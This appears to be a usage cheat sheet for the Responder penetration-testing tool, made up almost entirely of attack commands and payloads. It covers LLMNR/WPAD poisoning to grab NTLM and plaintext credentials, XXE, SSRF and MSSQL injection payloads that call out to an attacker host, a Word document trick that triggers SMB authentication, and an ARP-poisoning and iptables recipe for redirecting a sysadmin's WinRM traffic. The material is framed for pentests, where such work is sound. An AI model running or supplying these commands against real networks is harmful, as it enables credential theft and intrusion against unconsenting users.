Responder Common Attacks:
Basic usage:
Redirect workstations to Responder HTTP authentication server and grab NTLM credentials:
./Responder.py -I wlp2s0 -rF
Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
./Responder.py -I wlp2s0 -rb
Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials:
./Responder.py -I wlp2s0 -rP
Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
./Responder.py -I wlp2s0 -rPb
Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject a SMB UNC path to grab credentials transparently):
./Responder.py -I wlp2s0 -rw
Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication:
./Responder.py -I wlp2s0 -rwF
Redirect workstations to an other IP instead of Responder's one:
./Responder.py -I wlp2s0 -re 10.0.0.234
More Advanced attacks
Responder can be used as a poisoner but can also be used as rogue servers when combining with other attacks, these attacks will be documented below.
External Pentest
Responder can be used on an external pentest in the following situation:
- XXE:
Set your XXE payload this way:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://Responder-External-IP/test"> ]>
Watch for any HTTP hashes coming in on your Responder shell.
Another way would be to set a UNC path instead (less reliable since outbound SMB is often blocked):
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://Responder-External-IP/test"> ]>
- MSSQL SQLi:
SQL Injection on MSSQL can lead to NTLMv1/2 hash grab:
xp_dirtree "\\RESPONDER-IP\share";
xp_fileexist '\\RESPONDER-IP\file';
- SSRF:
Point your SSRF payload to Responder:
http://Responder-External-IP/123.html
- Phising:
Create a word document and open it:
Hit CTRL + F9 -> IMPORT "\\\\Responder-IP\\123.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close.
When the victim opens the document, an SMB request will be issued to Responder-IP.
Internal Pentest
Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning.
Let's take the example where you know that a sysadmin workstation is located at IP: 192.168.0.153 and you know that this sysadmin is using WinRM to administer servers remotely.
Sysadmin workstation:
192.168.0.153
Switch IP:
192.168.0.254
Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our rogue WinRM server:
//Block ICMP to prevent outgoing ICMP
iptables -A OUTPUT -p ICMP -j DROP
//Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986
iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986
//Enable IP Forward to avoid disruption
echo 1 > /proc/sys/net/ipv4/ip_forward
//Launch the targeted ARP poisoning against 192.168.0.153
ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153//